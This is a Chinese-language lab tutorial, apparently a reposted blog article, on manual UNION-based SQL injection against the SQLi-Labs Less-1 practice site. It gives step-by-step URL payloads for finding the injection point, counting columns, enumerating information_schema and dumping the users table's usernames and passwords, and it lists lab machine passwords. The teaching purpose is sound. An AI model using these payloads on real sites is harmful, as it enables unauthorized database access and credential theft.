2026-04-13 06:06:32 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 该文档详细介绍了字符型GET注入的手工SQL注入实验，以SQLi-Labs的Less-1为例，通过联合查询（unionselect）逐步演示了注入点判断、字段数确定、回显位定位、数据库名获取、表名与字段名枚举以及用户数据提取的全流程。关键发现包括利用orderby判断字段数、informationschema获取元数据、concatws合并显示结果等核心技巧，最终成功暴露users表的登录凭据。 综合评分： 85 文章分类： WEB安全,实战经验,漏洞分析

cover_image

SQL注入&字符型get注入

原创

建哥聊安全建哥聊安全

建哥聊安全

2026年4月9日 08:35 湖南

SQL注入&字符型GET注入

实验目的

理解字符型GET注入的原理和特点，掌握利用联合查询（union select）的方法实现SQL注入的基本流程。

实验环境

攻击机：Pentest-Atk

（1）操作系统：Windows 10

（2）安装的应用软件：Sqlmap、Burpsuite、FireFox浏览器插件Hackbar、FoxyProxy等

（3）登录账号密码：操作系统账号Administrator，密码Sangfor!7890

靶机：A-SQLi-Labs（环境自行准备）

（1）操作系统：CentOS 7

（2）安装的应用软件：Apache、MySQL(MariaDB)、PHP；DVWA、SQLi-Labs、Webug3.0漏洞网站环境

（3）登录账号密码：操作系统账号root，密码Sangfor!7890

实验原理

字符型GET注入，其注入点存在于URL中的GET参数处，如http://www.testweb.com/user.php?id=admin，而服务器后端实际查询代码原型诸如：“select … from … where id=’$id’…” 。攻击者可以通过构造恶意的GET输入参数，利用union select命令进行注入，暴露数据库中存储的信息。

实验步骤

本实验的目标是：以SQLi-Labs网站的Less-1为入口，利用联合查询（union select）的方式实施SQL注入，获取SQLi-Labs网站的登录用户名和密码。

1．访问SQLi-Labs网站

在攻击机Pentest-Atk打开FireFox浏览器，并访问靶机A-SQLi-Labs上的SQLi-Labs网站Less-1。访问的URL为：

http://[靶机IP]/sqli-labs/Less-1/

(注意大小写)

登录后，根据网页提示，先给定一个GET参数，即：

http://[靶机IP]/sqli-labs/Less-1/?id=1

此时页面显示id=1的用户名Dump、密码Dump。

说明：本实验环境中FireFox浏览器已预安装Hackbar插件，在FireFox界面按下键盘上的F9键启用或停用（本实验环境中默认为启用状态）。建议在注入过程中用Hackbar插件来调整payload参数！

2．寻找注入点

分别使用以下3条payload寻找注入点及判断注入点的类型：

http://[靶机IP]/sqli-labs/Less-1/?id=1′

运行后报错！

http://[靶机IP]/sqli-labs/Less-1/?id=1′ and ‘1’=’1

运行后正常显示！

http://[靶机IP]/sqli-labs/Less-1/?id=1′ and ‘1’=’2

运行后未正常显示！

由上述结果可以判断，网站存在字符型注入点。

3．判断网站查询的字段数

尝试使用以下payload获取网站查询的字段数（关键字order by）：

http://[靶机IP]/sqli-labs/Less-1/?id=1′ order by 1–+

正常显示！

http://[靶机IP]/sqli-labs/Less-1/?id=1′ order by 2–+

正常显示！

http://[靶机IP]/sqli-labs/Less-1/?id=1′ order by 3–+

正常显示！

http://[靶机IP]/sqli-labs/Less-1/?id=1′ order by 4–+

报错！

由上述结果可以判断，网站查询的字段数为3。

4．判断网站的回显位置

利用以下payload判断网站的回显位置：

http://[靶机IP]/sqli-labs/Less-1/?id=1′ and 1=2 union select 1,2,3–+

执行的结果是：2号位和3号位可以回显！

5．获取网站当前所在数据库的库名

使用以下payload获取网站当前所在数据库的库名：

http://[靶机IP]/sqli-labs/Less-1/?id=1′ and 1=2 union select 1,2,database()–+

显示结果为security。

6．获取数据库security的全部表名

使用以下payload获取数据库security的全部表名：

http://[靶机IP]/sqli-labs/Less-1/?id=1′ and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=’security’–+

显示结果中，有一个名为users的表，这当中可能存放着网站用户的基本信息。

7．获取users表的全部字段名

使用以下payload获取users表的全部字段名：

http://[靶机IP]/sqli-labs/Less-1/?id=1′ and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’–+

显示结果，users表中有id、username和password三个字段。

8．获取users表id、username和password字段的全部值。

由于users表中存放着多组用户名和密码的数据，而每次只能显示一组数据，我们可以通过limit M,N的方式逐条显示，如

（1）显示第1组数据

http://[靶机IP]/sqli-labs/Less-1/?id=1′ and 1=2 union select 1,2,concat_ws(‘,’,id,username,password) from security.users limit 0,1–+

显示结果为Dump，Dump。

（2）显示第2组数据

http://[靶机IP]/sqli-labs/Less-1/?id=1′ and 1=2 union select 1,2,concat_ws(‘,’,id,username,password) from security.users limit 1,1–+

显示结果为Angelina，I-kill-you。

（3）显示第3组数据

http://[靶机IP]/sqli-labs/Less-1/?id=1′ and 1=2 union select 1,2,concat_ws(‘,’,id,username,password) from security.users limit 2,1–+

显示结果为Dummy，p@ssword。

…

以此类推，可通过修改limit后面的参数，将users表中存放的所有用户信息全部暴露出来。实验至此结束。

实验总结

本次实验，成功实现了对存在字符型GET注入点的网站的手工SQL注入，掌握了基于联合查询的注入方法和流程。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：建哥聊安全建哥聊安全建哥聊安全《SQL注入&字符型get注入》